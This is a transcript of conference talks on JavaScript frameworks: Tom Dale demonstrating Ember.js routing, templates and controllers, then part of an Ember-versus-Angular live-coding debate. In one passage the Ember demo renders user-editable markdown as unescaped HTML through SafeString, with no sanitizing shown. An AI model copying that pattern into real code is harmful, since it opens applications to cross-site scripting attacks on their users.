able to click any of these files and see them show up. So let me go back to my router. So instead of saying files, I'll say the singular file. So we'll say this.resource file. And just as a reminder, this is basically saying I want a URL that's slash file. And now you're probably noticing a pattern here. I'll create a script tag. I'll give this an ID of file singular. And let's just see if this works. Okay, so now if we go back to our app, we refresh the page. So here's files. And if we type in file here manually, you can see that it replaces that outlet. It's basically taking out the old template and the old model and putting in the new template and the new model. And again, if I, the back button refresh, this all works exactly as we expect. Everything is not broken, which is actually an improvement over what we've got today. Okay, so how, so obviously the user doesn't want to type in all this stuff manually in the URL. How do we actually link, how do we turn these items into links? And remember the way that we do that is we can use this link to helper. So let me go into my HTML. And I basically want to say, okay, so I have these TRs and TDs, and I have the title on the author, let me wrap this in a link. So again, I'll use the link to helper. And I'll say basically link to file. And now if I refresh the page, you can see it's turned these into links. And if I hover over it, I know it's kind of hard to see it's kind of small over here. But it's actually linking to that file template. So if I click on file, you can see it's replaced. And I can hit the back button and things are working now. But the problem is, of course, that these are all different objects. And typically the way that we disambiguate between objects in our URLs is we give them an ID. Now if we go back and look at our fixture data, you'll actually see that these exist. If we look at the fixtures, here is the ID. The first one is Rails is omakase, and the second one is yruby. So these are not numeric IDs that you might be used to. These are string IDs, but the point holds. So how do we tell, okay, when you click on this link, don't just link to the file template. You also need to provide a little bit of information about which model it's going to be displaying. And the way that we do that is there's an optional second parameter you can pass to resource, which defines the path. So this actually supports a dynamic segment, which you may be familiar with, which is basically just a placeholder that gets filled in with whatever the ID of the model that it should be basically pairing the template and the model together with. So we'll say this will be slash file, and then colon file underscore ID. Okay, so now we have this dynamic segment, but there's a problem, which is that when we reload the page, everything breaks. But if you look at the error message, it's basically saying, hey, you're trying to call ID on an object that you haven't defined. Basically, we're trying to link to these, link to this template that's expecting to have a dynamic segment, basically a model ID associated with it, but we haven't actually told it which model it should put into the URL. So let's go back to our link to helper and basically put in a reference. So we're basically saying, okay, in this link to link to the file template, but the model that you should pass in is this file that you have in the list, right? So we're basically saying each file, and we're passing that in as the as the argument here. Now if we reload the page, let me close the debugger, if I hover over this, it's actually doing exactly what we want it now. This is pretty cool. So all we did was say, this resource has a URL with a dynamic segment in it, and then we link to it, not with by having to manually create the URLs ourselves, we simply pass in the model as the argument to link to, and it will automatically go generate this URL for us. So if I command click this, you can actually see that the URL is correct. This is slash file slash the ID, in this case Rails is omicase. And if we do the same thing with the second one, if we command click it, it's actually filling in the ID for the second object for us automatically. So I think this is pretty cool. We didn't have to write any code to go extract the ID from the from the object, basically just having a property called ID, told Ember to do this for us automatically. So let me bring in again in the interest of the time I have a pre populated, I have a pre populated template that I'm going to be using for the file template. So let me replace again this placeholder. And so basically what we're saying here is when you visit the slash file URL, display the post title, author, and then the contents inside of it. So now if we look at the files, we refresh the page. If we click on Rails omicase, you can see, okay, it's doing the right thing. So basically it's passing in the model. And now it's replacing the old files template with the file template, and it's getting the appropriate data from the model. So this is our first blog post. And if we go back, you can see the back button is still working. And then if we click on the second one, you can see that it's replaced the content. So basically the same template, but now backed by a different model. Okay. Unfortunately, I have a little bit of bad news for you. And the bad news is that I have done the bad thing, which is that if I refresh this page, it's busted. Well, why didn't this work? The reason it didn't work is that before we already had the model in memory, right? We were looping over it. So we knew exactly which model was associated with that link when you clicked on it. But of course, if you're coming in from a URL, we need to somehow turn that URL into a model. The good news is that fixing this is very, very simple. So let me just go back into our router. Now, just as a reminder, the route is the object that tells the template, which model it should be backed by. In this case, we have a file route, but we are without a model. So I'll just say app.file route again, this is the singular, these are all stitched together by their names. So I'll say ember.route.extend. And then here in the model hook, I actually get an argument to the model hook that I didn't need before because it was always the same model. But if the model varies, this leave it has a dynamic segment associated with it, I get this params hash. So what I can do now is I can say, if you recall, I actually have these models indexed by ID. So in our dynamic segment, you can see we have this argument called file underscore ID. That will actually be one of the arguments passed in to the model function. So I'll just say var ID equals params.file ID. And then from that files hash, I'll say return files ID. So again, this is just a little model hook that's taking the URL and telling ember, how do you turn this unique ID into a JavaScript object? So that's all it's doing. And now if we refresh the page, hey, look at that. It works. So very, very little code. And now we have awesome good URL support with dynamic segments. And of course, the back button still works. Go forward, go back, click on this, go back, command click, opens a new tab. Everything works as we expect. So we're not losing anything that we would be used to having with a server. Of course, it's very, very fast and we don't need to round trip over a high latency connection. Okay. So that's pretty awesome. However, there is a small problem which is that I'm looking here and I'm noticing this is actually marked down. This isn't HTML. And it would be nice if instead of making my user read these weird characters if I could actually turn mark down into HTML for them. So this is where that little library that I included called showdown comes into play. So what we can do is register a small little handlebars helper that will convert any value passing your template into another value. So this is basically a function that gets executed. So let's define a handlebars helper called markdown that will take a string of markdown and return the HTML. So I'll say ember dot handlebars dot helper markdown. Let me close this other page so you can see this function. And this will take a value. And then just the API for using the markdown, sorry, the showdown library is we create a converter. And then we'll just return the converter dot make HTML value. Okay. Now if I go and refresh the page, so the first thing I need to do is go back to my template and tell it instead of just outputting the contents directory, sorry, directly, use this new helper that we've just defined. So we'll say markdown. And now if we go and refresh the page, well, it's getting there. We're actually seeing the HTML, but handlebars built in tries to prevent cross site scripting attacks. So it will actually escape anything you return from a handlebars helper so you don't accidentally take user provided content and emit something that is dangerous. But in this case, basically what we want to say is hey, we're going to take responsibility for doing any escaping and sanitizing. So the API for this is to just wrap in our helper. Instead of returning this string value directly, we just wrap this we say return new handlebars dot save string if anyone's used to handlebars before another project, this is exactly the same. And this basically says hey, I'm opting out of cross site scripting protection, so basically it's on you as a developer at this point to make sure that nothing bad happens. Okay, now if we refresh, you can see that it's okay, cool, awesome. We've got our link, it's now properly formatted as HTML. But let's go ahead and edit this now. Because having an editor, basically having a list that only read only is pretty boring. So I'm just going to grab a button here. Now so far we've talked about templates, we've talked about models, and we've talked about routes. But Ember is an MVC framework, so you might be wondering okay, what point do controllers come in here? And the role of a controller in our system is basically to handle events that originate from the view, from the template. So that's what we're going to do right now. Let me just grab this prepared statement. Okay, so we'll go into our index.exe and go into our index.html. And basically when we're looking at a particular file, what we want to do is we'll say basically if we're in editing mode, have a button that sends the done action, otherwise have a button that sends the edit action. And then you're probably noticing a trend here that all of these things are wired together because of the fact that they share a name. So we'll create a controller that's connected to the file template by saying app.file controller. Okay, and then we can just handle events by implementing a method essentially with the same name as the event. So over here we have a button that says if it's not editing, it'll send the edit event. So we'll just implement a method on our controller called edit. So again, this is just a standard JavaScript object. It's just a method on this object. And we'll just toggle, we'll say set is editing to true. And then while we're here, we'll just go ahead and make the done event like we had. And this again is just a function that we'll get called when we send the done event. And this one we'll basically turn editing off. Okay, so now we've got our edit button. And we can click this, you can see that we're toggling basically. So we click edit, it switches is editing to true, it changes the button, we click it again, and it toggles it back. So let's just add an editing UI here. So again, I've got a template prepared. So let me open this up. And this is actually something called a partial. If you're familiar with templates, you may have heard the term partial before. This is basically just a template that you can reuse in multiple places. So I'm going to paste this in and just by convention, our template, sorry, our partials end with an underscore. And we can include the partial in our file template by using the partial helper. Come in here and say partial file slash form. And this basically says just take this partial form and include it where we call the partial helper. And now if we reload the page and click edit, now you can see that we have our editing UI. But what's really cool about this and where you start to see the shine over something like a traditional server side MVC framework is the fact that this is all live. And the handlebars template that we defined is all bound. So I can actually come in here. And I can start typing markdown. And it's going to in real time, basically as this underlying property changes, recompute the markdown and re render it. And that's very, very little code. Okay. And then we click done, you can see it toggles it and it keeps that basically keeps the change that we made. So awesome. So what have we done? We have a list of files we can we can go back to. We can click on it, we can edit it. As we edit it changes are are highlighted below. Automatically, we can refresh, we can command click basically six behaves exactly as we want it to. And we have only written 34 lines of code. I think that's pretty cool. Now there's just one last thing that I want to show you that I think is what makes Ember really shine. And that is the fact that if your design team comes to you and they have a really cool design they want you to implement, a lot of JavaScript frameworks fall down, especially if you have to have URL support. So let me give you an example. Let's imagine that we are looking at our list of files. And what our design team says actually instead of replacing this when you click on a link, instead of what we want is to keep the list on the left hand side but when you click show it over on the right. Now this would be something that would be very challenging to implement in a lot of frameworks but in Ember it's a couple lines of code. Let me show you how. All we have to do is go to our router and this is something we're going to call a nested resource. This is basically a resource that lives inside of its parent. So in this case we have a file that will live inside of this file's resource. So the way that we do this is we can pass a function as a second argument to resource and then I'll just take this and I'll move it inside. And then because the URL is getting concatenated I'll just remove the file. It's no longer necessary. We'll just put the dynamic segment. And then just recall that an outlet is a placeholder that you render your child template into. So now all we have to do is go to our index.html and I already added it. So basically just recall that there is an outlet here which is where this kind of parent resource will be rendered into. Okay so let's go back to files. And now when we click boom shows up right on the right hand side. And so I think that is pretty freaking cool. Like two lines of changes and all of a sudden we have this completely altered nested hierarchical UI but it hasn't busted our URLs at all. Everything has continued to work. So we can edit it and oh this is actually cool too. So as we start changing this you can see on the right hand side because these models are connected and they're all bound even the list on the left hand side starts to update now. Okay so hopefully that shows you just a little bit of the power of building an Ember application and walks you through the process. Basically you have templates connected to models. Those are all set up by the routes and those routes are all powered by URLs. And as you move around the application the framework is responsible for keeping the URL up to date not you which means it actually happens. So just to recap I don't think there's ever been a more exciting time to be a web developer. The pace of innovation is picking up it's incredibly fast. You know it's crazy. All of these technologies that we've had in computers since like the 80s. Things like being able to handle binary data and open files and open a socket. These are all things that we take for granted when we're building applications in a native environment. But we have web versions of all of these things right now and they're landing in browsers. It's time to start getting excited and think about wow now that the browser is a real honest to goodness application runtime how do we start harnessing that power and how do we start harnessing that power without breaking URLs. So a lot of the stuff coming in the browser is powerful to the raw features but they don't give you the architecture. So what Ember is about is giving you this application architecture to let you harness all these really powerful primitives and keep that URL up to date. And we're keeping it future proof. So basically we're working with the standards bodies to ensure that all of the features coming in the next version of JavaScript in the next version of the DOM API are compatible. In particular we're really hoping to take advantage of things like modules. There's new array proxies which will eliminate the need to do.get and.set. So be able to do model.foo equals bar and it will update automatically. And I think web components in particular is something that we're all very excited about which is basically a way for you as a developer to describe your, to basically create new HTML elements, describe their behavior using JavaScript. And that for us replaces the Ember view system and I think us and a lot of other libraries are excited about it and we're excited as soon as the stuff starts landing in browsers we're going to get it on board. So with that thank you guys so much. If you want to follow me on Twitter I'm at Tom Dale and I guess you guys are free. Thank you so much.
|
Many web developers are seeing the benefits of moving their application logic to the browser, allowing them to create interactive experiences that users love. A new generation of JavaScript frameworks has emerged to make this even easier. But many of these frameworks forget about the key feature that made the web in the first place: the URL! In this session, you'll see you how Ember's router puts URLs front and center. You'll also see how embracing convention over configuration leads to compact, predictable, and testable code.
|
10.5446/51521 (DOI)
|
We are shooting a commercial film for NDC right now. So we're going to do some pictures from on the audience. So people in the middle are going to be film right now. So if that's not okay for you, we will like you to move to the sides. And this will take like five, ten minutes. And as a film going to be showed on the internet page for NDC. Thank you very much. Okay everyone, welcome to the Cage Match. Between these two lovely guys here, just give them a round of applause first because they're going to be doing a lot of hard work in the next hour. And starting from the left we have Tom Dale. He's involved with the EMBA project, which he'll be showing you plenty of that in the next hour. And works for what? Tilda? Tilda, yeah, it's like the punctuation in Spanish for all my Spanish speakers out there. Okay, and then on the right we have, he possibly needs no introduction to this audience. It's Rob Connery of TechPub and obviously, well-known man in the dot net world. So we're here to talk about JavaScript today. Previously there have been contest streams like Rails and ASP.net and stuff like that. But we're now going to say that's a lot more applicable to everyone. Nowadays if you're working on the web, is using JavaScript in one way or another. You might be using some sort of derivative course like a Dart or a CoffeeScript, but ultimately if you're going to be in the browser you're going to be using JavaScript. And JavaScript has had a very interesting history. I remember when I first saw it very early on when it came out. It wasn't that useful for very much. Perhaps all you could do if it was, you know, check things were entered correctly on a contact form, maybe get some snow to fall down a web page. I know there are still many e-commerce sites that do that type of thing. If you do it, shame on you. But things eventually progressed and became more interesting. Around the early 2000s, Microsoft introduced this technology for doing direct requests from JavaScript through the browser. And eventually other browsers took this on and it became a thing we all know as Ajax. And that's when things became interesting with the whole Web 2.0 world and things were more interactive and you could update pages about doing anything. And so that kind of brings us to almost the world we're in now, which is where we ended up with libraries like jQuery which made our lives a lot easier, things like Backbone provided some structure. And then there were bigger things like Sproutcore, for example, which was a framework, which still is a framework, still exists, for building larger apps online. And I think Apple used it for their iWork, their online, you know, Office apps stuff. But then kind of out of all of that, we've kind of almost gone full circle back from this, let's put a desktop app on the Web back to let's just use the Web for what it's good for. We now have the JavaScripts with which to do that. And so that's the context we come to today with the two libraries we're going to look at all. I guess you could say frameworks even. So Ember will be on the left, Angular will be on the right, and we're going to do a comparison of both of those. So the first question I just want to ask to get this going is why would you even want to make an app that's so heavily JavaScript based and is, you know, a single page essentially with JavaScript detached, and not like perhaps we used to using something like Rails or an ASP.net and just, you know, providing it all from the back end? Because I like coding on the server side. I don't want to be coding on the front end. So why should we be doing this stuff? So Peter, I think the real reason is that if you think about what's actually going on in the Web browser, the way we've traditionally built these Web apps, the whole thing is a massive hack. Think about what's actually happening. You have a browser and... Wait, are you talking about Ember? No, no, I'm talking about all these older... Sorry. So Rob and I had beers. We preemptively had beers last night so that when this knock-down drag-out match really starts happening, we preemptively know hard feelings. So I think if you think about what's happening, it's a massive hack where you're using these Web applications, but your UI is being rendered on a computer in a data center miles and miles away. And what that means is that unless you have perfect conditions, you're always going to have a little bit of latency between when you click on something and when it responds. Especially when you think about the proliferation of like 3G networks or especially in countries where they're still developing and you don't have these high-speed connections that we take for granted. And I think the other thing is that if you think about how most applications are built, whether it's a mobile app or a desktop app, you're consuming a JSON API, right? And so what ends up happening is that your Web application is this weird, hack-together mess. It's like a very angular-like mess of your API and your Web application logic and all these kinds of things. You keep talking about Ember and I'm like, come on, what are we doing here? So separating the... I think we all agree that separation of concerns is important. Having well-factor code is important. And separating the presentation from just generating the JSON data I think is a really good way to architect these applications and basically if you think about it, it brings everything into unity. Your Web application consumes a JSON API, your iOS application consumes a JSON API, and your desktop application. How many of these did you drink? 17. Okay, I just want to be sure. Just for you. I think the beers might be... We've talked about having beers before the talk. Yeah, this is an Irish coffee. Yeah, so I was going to say I wanted to... Because that's really how you're supposed to write Ember's flat drunk and then it all makes sense. Ballmer peak. That's right. Okay, guys, so all right, let's say you've convinced me at this point. I know jQuery. I'm sure many people here know how to use jQuery. You can do all the basic stuff with that. Why wouldn't I just do what I've been doing previously, making Ajax requests using jQuery and stuff like that? Why wouldn't I take that approach? Why not just use jQuery instead of Angular or Ember? Well, at some point, I was just talking about this the other night. Someone is looking at me and saying, why do I need this big monolithic pile of garbage? Why don't I just use jQuery? And I said, well, by the time you're wiring an event for five different things across your screen and you're juggling all this stuff, with jQuery, you begin to load JavaScript. And I think that's where these frameworks come in. They just help you do a simple thing and you're on with your day. Oh, nice, nice simple answer there. You like that? Okay. I haven't had 10 cups of coffee. Well, we'll get to see these cups of coffee in action now because they're actually going to start to develop something now. This is actually getting things up to scratch, the most basic kind of boilerplate, doing some binding, all that type of thing. So this is now where I get to almost take a bit of a rest and step back and just egg you on from the side. If anyone wants to heckle from the audience, you are more than free to do this, of course. Heckle him, yeah. Heckle him both. So first, we're going to start with some boilerplate and get going. So we'll start with Ember. I'm basically going to show you how easy it is. We're going to get you set up. If you want to get started with Ember, the best way to do this is just to visit emberjs.com. We have a link to a starter kit. If you click on the starter kit link right here, it will download a zip file that has all the dependencies and an HTML file ready to go so you can basically hit the ground running. I'm going to be using that. The only modification I've made here, if you look at the top, I've actually included Bootstrap CSS. So both Rob and I will be using Bootstrap CSS for the purposes of this demo. So the first thing we want to do is just put some data on the page. And I'll show you my application, sorry, my Ember.js here. I'm going to delete everything. And the only thing I'm going to have here is this application file. So I'm basically telling the browser, hey, create an Ember application. And that's basically all you need. Ember takes over at that point. It's like, all right, we're going to be building an Ember app. And the first thing it does here is it's going to go look for a template, a handlebars template. So how many people here are familiar with the handlebars templating language? Okay, a lot of you. Yeah, a lot of people. Great. So the idea here is basically that dynamic values are just wrapped in curly braces. So check this out. I'm just going to put an H1 tag. And I'll say, hello, NDC. And now if I come back and reload our page, you can see that my H1 tag shows up. Well, that's pretty boring. Let's try to make that a little bit more dynamic. So the first thing I'm going to do is just create a text field that's dynamic. So I'll say, input type equals text. And we'll just bind the value to a property called title. And now we'll just replace this NDC with title. We'll reload the page. And you can see as I type, it's actually live updating that title. So I didn't need to write any code other than creating the application. All I do is create this dynamically bound text field. You can see I'm just binding the title value to this title property here. And Ember automatically keeps them in sync. So we're done. That's it. Thank you for coming. Thank you. Sorry if I unplug you. Now we get to see the other side of things. So work when it works. I think the display port's full of Ember weirdness. There we go. So before I get started, can you guys hear me? Okay, you can. Before I get started, this is a coupon code for a tech pub. Clap for me. Okay, please. Thank you. Thank you. Sorry. I just had to pull out the stops. All right. So Angular works in almost the same way in principle. You have an application. The application has controllers and kind of similar concepts except Angular works heavily with the DOM. You're able to do templating things like Tom just did. But basically, all you have to do to work with Angular is number one, Reference it, which I have it down here at the bottom of the page. And at some point in some tag, you need to tell Angular that this is an application. And you do that right in the DOM using a tag. And so I'm saying that is an Angular app. And so next up, I can tell Angular I want to do something. And so we'll do an H1 tag. And inside here, let's see. I'm going to put, let's just say, message. And I'm using the same templating syntax, but this is right inside the DOM. And that's the key difference between Angular and Ember, is that Angular hijacks your page. Anything that's wrapped with NG app is hijacked. So think of it that way. So what you're saying is Angular has to scan the entire DOM every time the app boots up. I don't know. No, it doesn't. So let's see. Input. OK. So now what I want to do is I want to do some binding here. And I want to set this to type text. And so to bind an Angular, you just have to simply say ng model and give it a name. And we're going to say this is message. And so by the virtue of this having a model and saying the name is message, we have message here. That's where it's going to be output. So I save it. And then I go over to my page right here and reload. And that's lovely. And have some CSS problems. So watch this on the fly. Let's see. Style equals. I'm giving you a prime chance right here. I just never watched a man drown before. There you go. There it is. There it is. OK. So the same kind of deal. And that's pretty much how you work with Angular. A very similar approach except you don't have that nasty handlebars. Wait, hold on. I thought Ember was supposed to be really hard to get started compared to Angular. It seems like they're basically the same thing. Except for the fact that the Ember app actually scales and doesn't collapse on itself. OK. You remember the coupon thing, right? I want to hear some booze people. Come on. I don't think the audience is on your side here, Rob. I'm sorry. OK. As you were. So what do you think? Yeah, it's good. I must admit, I kind of like the Angular thing about you can actually type HTML. I kind of already know HTML. Well, so... I'm not sure how close is what you're doing. Well, here's, I think, the really neat thing is that Ember as a framework really embraces HTML. It's not like some of the previous generation of JavaScript framework that said, hey, throw away everything you know about the DOM and HTML and CSS and use our widget library. We do not believe in widget libraries. We believe in embracing HTML. And so if you look at what we're doing here, the way that I want you to think about this is the difference between a dynamic tag and a static tag is just to replace these angle brackets with curly brackets. So when you're looking at your template, you can see what's dynamic because there's these two curly brackets instead of having to look for ng-attributes everywhere. It's very obvious what's dynamic and what's not. OK. So now I want to step further and actually make this a bit more interesting, a bit more interactive, because obviously putting text on the page, you know, I could do that in jQuery in like a couple of minutes. Right. This makes it easier, but I'm not just going to load up Ember or Angular just to do this type of work. So if I should want you to think useful now, what's the next step we can take with this? Sure. Just to see the power. Yeah. So let's just put maybe a list of some things on screen and be able to click around. So actually one really nice thing about Ember is that we make you think about URLs upfront. URLs are such an important part of the web and, you know, a lot of people think that if you use HTML, CSS, and JavaScript, that makes you a web developer. But in fact, these are just technologies that happen to be in the browser. But what really makes a web developer is someone who cares about URLs. If you don't care about URLs, you are not a web developer. So the way that you think about stuff in Ember is basically the first step is what's the URL for the template I'm about to show on screen. So to do this... It's like URL driven development kind of thing. Yeah, yeah. That's a good way to think about it. It's like if we have anyone... You can get points and then you work back from those. Right, right. And basically instead of the URL being something you just tack on at the end, something your manager comes and says, hey... Rails. What's that? Rails. Yes, yes. Very inspired by Rails where you think of... URLs are important, right? They're the thing that makes collaboration and sharing on the web work. So instead of being a thing that you just tack on, your manager comes and says, hey, I noticed that when I reload the page, everything breaks and I start back from scratch. We want you to think about these URLs from the start. So to do that in Ember, you have this router object. And the router object is responsible for basically translating these different URLs into templates that go on the screen. So let's say... So by default, we have a route called the index route. And that's basically the template that gets displayed by default. So I don't actually need to define a route at all. I'll just go into my index.html file here and I'll just name this template. The way that you name a template is basically you give it an ID. So we'll just call this index. And now if I reload the page, you can see this content is still here. But now let's say I want a new page. Let's say I'm working on like a blog or something. We can make a new page just by going and thinking, okay, what's the URL that would be associated with this page? So to do this, we'll just say this.resource about. And now we'll go and create the template for that page. So we'll call this about. And now we want to have some kind of navigation menu. How do we do that in Ember? The way that we do that is there's a template that's always on screen. This is basically, if you think about how you would normally develop a web application, you have like a header and a footer and then the content in the middle kind of changes, right? So the way that we do that in Ember is we have a template called application. So I'll just call this like my app. And then in order to tell Ember where all the sub-templates render, we just have a little handlebars helper called outlet. We're still working on the web, right? Yep. Okay. And now in our application template, we'll just put a link. So we'll say link to home. And that pound link to, is that a macro? This is actually, yeah, it's a list derivative. And then we'll link to the about page. I'll say about. You know that link to is six times less efficient than I. Because anchor tags, you don't want to be using that, right? Okay. So now you can see without writing any JavaScript code whatsoever, I just click between home and about, and you can see that it actually changes between these. And the important thing here, look at that URL. It's updating automatically. We didn't have to write any code to keep the URL up to date. It means that we can refresh the page. And so you can see I'm on the about page. I hit refresh. The about template shows up right inside that outlet that we defined in our application template. If I go home and refresh the page, you can see that the correct template is displayed. I have full back buttons. I can command click to open. Basically URLs work as expected without any code at all. So how does this affect my SEO positions and everything? Well, that's a great question. Well, the nice thing is that because you're writing your application using handlebars templates, there's basically a bajillion implementations. You can run it in Java. You can run it in Rails. So it's really easy to take your handlebars templates and basically render them on the server. You did that well. Thank you. Okay. So now let's see how this is done properly by Rob. Oh, geez. See, he's on my side. I'm not taking any sides here by the way. Yeah, right. No, hey, man, it's good. It's good. Don't feel sad, okay? You know. Sorry. We'll hug afterwards. All right, that's true. Okay, turn on. I must say though, definitely my favorite is Tom's for actually being able to see it because this is, what's this, 640, 480? Yeah, it's so, because I like to, I'm nearsighted. Well, the thing is with Angular doing dirty checking at that resolution, it just bogs down. Exactly. And it's a little bit older, the eyesight. Oh, geez. Wait a minute. Didn't we? All right. Angular works, Angular works well for demos. So what you guys are seeing is always a really fun demo. Like, woo, look at binding with just a few tags in the DOM. And so now that we're going to do some routing, we've got to do things a little bit differently. Welcome to the real world. Welcome to the real world. Why am I surprised every time you add a new feature, you have to rewrite the app. Exactly. Okay, so the first thing we're going to do is we're going to give our app a name. Right here, I just said ngapp. That's kind of a global thing. Like, there's an app somewhere here. Go find it. And so like you said, Angular scans the entire DOM. It's not really fast and I eat. Yeah. Did someone turn off your microphone? That's too bad. So I'm going to just put Ember, let's see, Ember sucks? No, that's not too harsh. Ember really sucks. That's my app. No, that's too hard to type. Ember is love. Good thing you have an ID to help you here. It's WebStorm. Come on. Let's see Camelkaze back into HTML. You like that? I know. Very Daltonette, then. That's so retro. Listen to you guys. So the first thing I want to do is I'm going to create an app. So the way you do that is you just say var, let's call it app, equals Angular.module and then you give it a name. And so in this case, we need to just tell it the name that we put above. Ember is love. So is it a module or an app? It's a good question. Angular is very modular. So when you declare an app, you can have your app be one single module. You can have modules that work with other modules. It all works on a principle called dependency injection, which is what I'm going to declare right there. So the dependencies for my app, and right now it's nothing. To me, I hate this API because why don't I just leave this as empty? Because there is no dependencies that I'm putting in there, but if I do that, it will break. Yikes. Yeah, so that's kind of a weird little API bit. So the next thing I want to do is I want to define a controller. Actually, no. I wanted to app.config. Config. See, I blow this all the time. It's config. It's not configure because at extra URE, that's just way too hard to do. It seems really ad hoc, I'm not really that well thought through, Rob. Okay, so anyway, I'm going to inject a route provider. So what this is going to do is it's going to let me to work up some routes. Now this is the thing with Angular that you have to get used to right away. Dependency injection is everything. And if you try and do something with any of the core bits in Angular, it will break unless you inject the thing that you need. So let's see, and I'm going to say route provider.win. Hey, thanks. Win that and oh, God, when? And no, that's not right. So you got a module that you can configure to provide a router to do some dependency injection. Is this a framework or a computer science textbook? Right? I know as I'm writing this out, I'm having brain lock, I'm like, oh, God, this is how you do it. So let's see, then I have to tell it, let's just use the templates. I had this one be quicker. I thought Angular was so easy to get started with. I'm under the gun. Alright, so template URL and we're going to say this is going to be home templates. And then I'll set a controller. And that would be home controller. Okay, and that means I need to come up here and erase this stuff. Wait, but if the template's named home and the controller's named home, can't you just put them together? You have to write code to do that. Brutal, brutal, brutal. Okay, so I need to do a script tag and here's another fun thing. Oh, I thought there were no script tags. What's going on here? You were just clowning me about there being script tags and ember. Okay, I have to finish this at some point. You don't mind if I do, right? Tom, do you think we should go and get lunch? Yeah, probably, yeah. How about Thai? Yeah. Sushi sounds good. Yeah. Okay, so anyway, I'm going to say this is home. All right, so I'm going to do the same thing below here. And I'm going to create two templates. And I'll say this is the about template and I'll say about. Wait, it says template URL, but you're not actually creating a separate file. How is that a URL? So with this size, right, it's a good point. So what you do in here is you can specify two things. I can say template and I can just pass in straight up HTML and have it just puke out on the page. I can do template URL if I want and I can name my thing.htm if I want. And it'll go and try and scan the DOM and find it on the page and then it'll just use that. If I want to have it as a separate page that's off on the server somewhere, it'll go ahead and pull it down and everything will work ideally. See, now that is cool. You like that? Yeah. I do like that too. So, okay, so I need a controller now and so, you guys still awake? So let's see. We'll blame it on old age and not Angular. So I'm going to call this home controller and then function and I'm going to pass in a thing called scope which I'm going to talk about later on. How do you guys spell scope? And yeah, that's it for right now. And so, right, so I need one more controller. No, I don't. So let's see. So let's do another route here. And I'll just say when about. And I'll pass in this and it's going to be template URL. It's just kind of like Java now with a lot of boilerplate going on. Yes, it is. Actually, this is the big cliff when you start doing stuff like this, it all of a sudden takes on a little bit of. So I guess this is like the benefit of some, you get tools like Bower that will like create a project from scratch and it will fill out a lot of this stuff. Well, that's not Bower. That's Yeoman, right? Bower, yeah. Is it? Oh, that was dependencies, isn't it? Yeah, Bower is the package. Yeah, Yeoman is the whole kind of suite of things. What's going on with your white space here? What is this? What's going on my way? I don't know. Something weird. Okay, so this is the, okay, so here's what I got so far. Trying to build some routing in here. I'm trying to build an app. So I've got, let's start at the top. I've got an app. I'm giving it a name. I've got some templates right here that I'm going to be working with, home and about. Okay. And so these things need an outlet. Just like an Ember, you have an outlet, you have like an application script tag. The final thing I need to do is tell this thing to render itself inside of an NG view. And that's where everything goes. What are the chances that I did this right? Well, that was a lot of code to type. Yeah, especially when someone's chirping in your ear, but whatever. I'll forgive you. I put your name for your stamina. Yes, what? Wait a minute now. I'm not touching that with a 10 foot pole. Yeah, look at that. It worked. Bam. So good. So what I got straight away is I got this, I got this hash bang upstairs, bang URL. That's how you know that everything's being rendered. And I didn't actually add a link. Let me just do that really quickly. Yeah, what about the links, Rob? So let's do a, because I can just use anchor tags. Is that okay with you? Okay, this is the six times efficiency kicking in now. Yeah. So then we'll just do this. This gets faster, we promise. So you actually just use, there's no helpers here, which I kind of wish there was. But so we'll do that and refresh. And so home, go here and about here. And if you refresh, those are the right things. Let's see. Refresh. Oh, that's gorgeous. URL, you like URL. Oh, those are beautiful. That's great. And I should mention that there's a way to get rid of that pound sign, but I don't know what it is off the top of my head. Sorry. Okay. Yeah. All right, I want to make professional heads. So represent Hangulite, you can see. All right, I want to mix this up a little bit. I want to mix this up a little bit. Okay, do it out. Okay, here's what I want to do. So I'm going to take this demo that I had before. So actually what I want to do is move the about page inside, nested inside of the index. So basically what I want to happen here is if I click on about, I don't want it to remove home page. I want to basically render in addition to home page. So instead of replacing the old content, just render an addition to it. So the way I'm going to do that in Ember is I'm just going to add what we call a nested resource. So let me say, it's not resource. Yeah, that's not confusing at all. Yeah, it works exactly like every other framework. It's really confusing. Just a zinger. Okay, looks like you have some syntax problems there, buddy. Whoa. All right, JavaScript. How does it work? I say that every day. Okay, so now I'll just go and I'll just move this outlet into, I'll add basically nested outlets. So basically the way to think about Ember is look at the top. It's just a template and it's backed by a model. And then inside of that template, you can have another template. And inside of that template, you can have another template. Your UI can basically get as recursive as needs to happen. Basically your designer comes to you. They have a complicated UI. You're not using Angular. You say no problem, we'll implement it. Okay. Oh, shh. All right. I have to say it, I'm not teasing you. This is the truth. That when you do hit an error with Ember, it's really descriptive. It is. Oh, yeah. Wow, thank you. That was really nice. Well, no route match the URL. I mean, you know the exact problem. It's kind of cool. I mean, when you... It's even going so well for Angular, though, is it really? Well... You're now kind of joining sides with... Yeah, I know. I'm like, can I just... Anyone want to stand up for Angular here? Come down here? No, but it is kind of cool because when you get a problem with Angular, bad. You have no idea what the hell that thing is saying. All right, so now you can see... So this is actually pretty neat, right? Is that when I'm at home and when I'm at slash, it's only showing our template for... Let me make this full screen. It's only showing our home page template, but because I've defined this nested route, it basically means when I visit that URL, render it inside of the template instead of replacing it. And you can see this is very little code. All I had to do was nest the resource inside of its parent. And now when I click on about, it renders both of these. If I command click, you can see it'll do the right thing. Apparently not. We can pretend. For some reason, my command click is not working, but when I copy the URL and refresh, you can see it does the right thing. So let's see it. Let's see this in Angular. Just pretend it worked. It did work. It totally worked. It worked. These are not the droids you're looking for. This is not the framework that you want to use. My computer keeps turning off. Uh-oh. Here we go. I'm realizing I need one of those new MacBook Airs with the all-day batteries. Oh, man. Okay. URLs in Angular are just a manual affair. So if I wanted to change the URL, like what did you do? You just put it inside of another... Nested it inside, yeah. So basically when you visit slash, it shows the home template, and when you visit slash about, it renders the about template into the home template. Yeah. Not. So at this point, so that's actually an interesting thing. At this point, this is where Angular and Ember kind of separate. So if that was something that I needed to do, I would create a separate template here and either make it a directive. Directives are encapsulated little bits of UI. Or I'd ask Tom what the hell he's talking about. But it's not... Angular doesn't do the nesting thing in that way. So it's not really a good... Is there any way to do it? Are there any libraries or projects? See, this is the thing. What are you trying to do here? I mean, I'm serious about that. Are you trying to... I'm picking examples that look good in Ember and they come out and mess you up. So if you want to... Let's let go ahead. Let me give you the use case. The use case is you have a list of blog posts. When you click on one of those blog posts, it's going to show the blog posts onto the right-hand side, right? So if you don't want to replace that list, you want to be able to show it on the right-hand side. Yeah. All right. Well, so this is... I wasn't going to get into directives until later, but let's just take a look at it. So one of the things about Angular is the concept of directives, which is encapsulated UI, and it can be really low level or it can have its own controller and be high level. So if you wanted to show something like a display of blog posts, let's say, you could have something like blog posts. Let's just call it this 